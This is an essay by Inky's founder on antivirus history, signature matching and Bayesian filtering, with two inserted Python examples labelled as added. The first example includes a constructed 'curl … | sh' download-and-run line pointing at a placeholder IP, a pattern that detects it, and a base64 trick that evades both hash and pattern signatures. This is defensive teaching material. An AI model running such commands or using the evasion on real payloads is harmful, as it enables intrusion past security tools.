By Dave Baggett
Back during the Dot-com boom – or what many of us now refer to as the Dot-com bubble – of the mid '90s, many exciting developments were shaping the foundation of the modern web.
In 1993, the Mosaic browser made the Internet accessible to everyday users by making data “pretty” with color and simple graphics. This development, along with the growing popularity of the home Windows PC and Mac, spurred rapid adoption of Internet service.
Like all great technologies, it wasn't long before these systems were reverse engineered and exploited, either for fun or for nefarious reasons. During this new era of communication, as the Netscape browser and online services like AOL became popular, so did malware and other scams.
Along with this explosion of web technology, software like McAfee and Norton became household names as “White Knight” protectors of computer systems from viruses that users had been led to believe were running rampant on the Web.
Interestingly, after all these years scams of all flavors are more pervasive than ever before. And not much has changed in how these traditional security systems protect machines, nor in how the same approach has been carried over to other functions like email.
A Quick History of Antivirus Software
Should you Google "first antivirus software", you’ll see a lot of sites populate with the same answer appearing in the snippet, identifying a then-25-year-old named Bernd Fix (seriously) as the creator of the first antivirus. Obnoxiously, it’s copy-pasted from whoever first wrote it, but it’s accurate, depending on how you frame “virus.”
You’ll go down a rabbit hole trying to verify the story without buying an e-book, but Fix was the first to document how he “fixed” the Vienna virus in 1987 – an unwanted program that essentially replicated itself from file to file and system to system.
This paved the way for the development of notable early systems like McAfee and Norton – after the Symantec acquisition of Peter Norton Computing – to come to the market. Over time, competition and demand would fuel growth for other products, some of which are still popular products today.
How These Systems Worked Then and Now
It’s one thing when a beloved product, be it Coca Cola or your grandma’s pie, still uses the same formula – nostalgia is fine for some things – but not so good in the case of computer software.
These traditional systems running on your computer, smartphone or server all rely on signature matching, supplemented by heuristics, to find, and hopefully stop, any sort of bad code from executing on your system. In an incredibly basic sense, the process looks like this:
- The security software actively runs in the background of your system.
- When a new app or plugin runs (or a file is written or opened), the software inspects the code in the application.
- Tasked with looking for “this code will infect your computer,” the software either:
  - Doesn’t see bad code and allows the software to run, or
  - Sees “this code will infect your computer,” stops the software from running, and either deletes or quarantines the code.
What Is and What Isn’t Bad Code?
Typically, every single system relies on a database of “known attacks” – signatures such as file hashes and characteristic byte patterns – to identify malicious code. This information is shared between different repositories all over the world and is periodically (usually daily) pulled by the security software, much like blacklists used at a nightclub or suspect descriptions used by police.
Your malware protection, email security, and spam filtering all perform this process in real time on the system where the software is installed. Provided that the attack has been seen and foiled somewhere before, and the resulting signature has been distributed, it’s part of the database, meaning the malicious code is recognized and contained before it causes any real trouble.
Of course, ask any bouncer or police officer and they’ll tell you new trouble makers pop up all the time.
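To make the signature lookup concrete, here is an added example (not code from the original article or from any antivirus product) of the two signature forms described above: an exact-file hash and a byte pattern. The "known bad" sample, the signature names and the variants are all constructed for illustration; the sample is a harmless made-up one-liner pointing at an RFC 5737 documentation address, not real malware.

```python
import base64
import hashlib
import re

# Constructed "known bad" sample for illustration only: a made-up one-line
# downloader. The IP is from the RFC 5737 documentation range, not a real host.
KNOWN_BAD = b"#!/bin/sh\ncurl -s http://198.51.100.23/x.sh | sh\n"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# The "database of known attacks": exact-file hashes plus byte patterns,
# the two most common forms a traditional signature takes. Names are made up.
HASH_SIGNATURES = {sha256(KNOWN_BAD): "Downloader.Sh.A"}
PATTERN_SIGNATURES = [
    # "curl <anything> | sh" on one line: a pattern, so it survives small edits
    ("Downloader.Sh.Generic", re.compile(rb"curl [^\n]*\|\s*sh\b")),
]


def scan(data: bytes) -> dict:
    """Return which signatures, if any, matched the given file contents."""
    result = {
        "hash_match": HASH_SIGNATURES.get(sha256(data)),
        "pattern_matches": [],
    }
    for name, pattern in PATTERN_SIGNATURES:
        if pattern.search(data):
            result["pattern_matches"].append(name)
    return result


def verdict(data: bytes) -> str:
    """'block' if any signature fired, otherwise 'allow' (the default-allow
    behaviour of a signature scanner is exactly its weakness)."""
    r = scan(data)
    return "block" if r["hash_match"] or r["pattern_matches"] else "allow"


# Three constructed inputs to scan:
# 1. a byte-for-byte copy of the known sample: caught by the hash
EXACT_COPY = KNOWN_BAD
# 2. trivially altered (extra flag, quotes): the hash changes, the behaviour
#    does not, and only the byte pattern still catches it
VARIANT = b"#!/bin/sh\ncurl -sS 'http://198.51.100.23/x.sh' | sh\n"
# 3. the same payload base64-encoded and decoded at runtime, so the string
#    "curl " never appears in the file: neither signature fires
ENCODED = b"#!/bin/sh\necho " + base64.b64encode(KNOWN_BAD) + b" | base64 -d | sh\n"

if __name__ == "__main__":
    for label, sample in [("exact", EXACT_COPY), ("variant", VARIANT), ("encoded", ENCODED)]:
        print(label, verdict(sample), scan(sample))
```

Running it shows the progression the article describes: the exact copy is blocked by its hash, the one-byte variant slips past the hash but is still caught by the pattern, and the re-encoded copy, which does exactly the same thing when executed, is allowed because nothing in the database describes it.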
The Bayesian Identification Method
Malicious code doesn’t always hide in plain sight. Imagine someone trying to sneak a chemical weapon through a secured gate – bringing the weapon in its entirety probably won’t work, but if each component is brought through separately, it may work.
For quite some time, Bayesian inference has been applied to heuristics in software for malware scanning and for filtering email. Instead of a rigid chain of rules (“if A then B” and “if B then C”), the model estimates the probability that a file or message is malicious given the small features it contains – individual tokens, header fields, code fragments – and, in the common “naive Bayes” form, treats those features as independent of one another. The conditions are deliberately kept this simple for a couple of reasons:
- Profiling applications or email headers using many small bits of information, rather than one exact match, is fast and lets evidence accumulate across features.
- In many instances, dangerous elements are fragmented and only assembled during runtime, so no single fragment looks like a complete, known attack.
By applying this logic, elements seen in previous attacks are used to score potential threats, making the heuristic process more effective than exact matching alone. While this allows systems to quickly detect issues in real time, it still depends on having seen similar elements before, so problems persist with novel malware and BEC (business email compromise) tactics, like phishing.
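The following is an added example (not code from the original article or from Inky’s product) of the naive Bayes scoring just described, applied to email text. The training messages are a handful of constructed, hand-labelled lines rather than real mail; the point is to show how many individually weak signals add up to a verdict, and what happens when a new lure shares no tokens with anything seen before.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed, hand-labelled training messages (not real mail). "phish" is the
# positive class. A real filter would be trained on many thousands of messages.
TRAIN = [
    ("phish", "urgent: verify your account password now or it will be suspended"),
    ("phish", "your invoice is attached, please update payment details immediately"),
    ("phish", "click here to confirm your login credentials, account locked"),
    ("phish", "wire transfer required today, send payment to new bank account"),
    ("ham", "lunch tomorrow? the usual place at noon"),
    ("ham", "attached are the slides from the quarterly review meeting"),
    ("ham", "can you review the pull request before the standup"),
    ("ham", "reminder: team offsite planning call on thursday"),
]

TOKEN_RE = re.compile(r"[a-z0-9']+")


def tokenize(text: str) -> list:
    return TOKEN_RE.findall(text.lower())


class NaiveBayes:
    """Multinomial naive Bayes over word tokens with add-one smoothing."""

    def __init__(self, labelled):
        self.class_counts = Counter()
        self.token_counts = defaultdict(Counter)
        for label, text in labelled:
            self.class_counts[label] += 1
            self.token_counts[label].update(tokenize(text))
        self.vocab = set()
        for counts in self.token_counts.values():
            self.vocab.update(counts)
        self.total_tokens = {c: sum(t.values()) for c, t in self.token_counts.items()}
        self.n_docs = sum(self.class_counts.values())

    def log_p_token(self, token: str, label: str) -> float:
        # Laplace (add-one) smoothing: a never-seen token gets a small
        # non-zero probability instead of zeroing out the whole product.
        return math.log((self.token_counts[label][token] + 1)
                        / (self.total_tokens[label] + len(self.vocab)))

    def log_scores(self, text: str) -> dict:
        # log P(class) + sum of log P(token | class), assuming tokens independent
        tokens = tokenize(text)
        scores = {}
        for label, n in self.class_counts.items():
            s = math.log(n / self.n_docs)
            for tok in tokens:
                s += self.log_p_token(tok, label)
            scores[label] = s
        return scores

    def classify(self, text: str) -> tuple:
        """Return (label, posterior probability of 'phish')."""
        scores = self.log_scores(text)
        m = max(scores.values())  # shift before exp to avoid underflow
        z = sum(math.exp(s - m) for s in scores.values())
        p_phish = math.exp(scores["phish"] - m) / z
        return ("phish" if p_phish >= 0.5 else "ham"), round(p_phish, 3)

    def evidence(self, text: str) -> dict:
        """Per-token log-likelihood ratio; positive values favour 'phish'.
        This is the 'small bits of information' view: no single token decides."""
        return {tok: round(self.log_p_token(tok, "phish") - self.log_p_token(tok, "ham"), 2)
                for tok in set(tokenize(text))}


MODEL = NaiveBayes(TRAIN)

if __name__ == "__main__":
    for msg in ["Verify your account now: password suspended",
                "slides from the standup review",
                "gift cards needed quietly, handle asap"]:
        print(MODEL.classify(msg), MODEL.evidence(msg))
```

The first message is flagged because several of its tokens were each seen only in phishing mail; the second is clean for the mirror-image reason. The third, a typical BEC-style request, contains no token the model has ever seen, so every token falls back to its smoothed default and the verdict is driven by the priors and the class sizes rather than by anything about the message. That is the gap the next section is about.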
The Flaws of Traditional Security Software
Many examples of these methods failing to detect an issue, like the recent zero-day exploit against Adobe Flash, regularly appear in news headlines. Because these systems can only flag what they have seen before, or what they can infer from elements of a previous malicious attempt, a genuinely new attack has a remarkably high rate of success.
The whole idea of real-time scanning sounds great on paper, but it’s not quite enough. This especially holds true for email scams. When an email, attachment or some other element is already accessible to a user, it’s a bit too late. A scan running on the receiving system (be it a physical machine or a hosted service, like an Office 365 app or even Gmail) leaves a window of exposure whenever the attack is completely unique. The sad truth is that this happens all the time.
In even more insidious attempts, let’s say a user’s business email account is already compromised, unbeknownst to anyone. The attacker begins to prod others in the organization for information. There will be anomalies in language, syntax and the structure of the messages, but will anyone notice before it’s too late? One thing is for sure: a traditional signature-based security system won’t detect these subtle nuances, because nothing in the message matches a known attack.
A keen human eye can detect these subtle changes, but only if the person is vigilant every time an email is read. Thankfully, machine learning and computer vision, properly applied to scan elements before they reach other users, can effectively uncover and stop scams before business is affected.
This is the next generation of computer security.
About Dave Baggett
Dave Baggett is CEO/Founder of Inky Anti-Phishing Software. As co-founder and COO of travel search provider ITA Software, Dave oversaw software development, operations, and customer relations, expanding the company to 500 employees. Google acquired ITA for $700M in April 2011.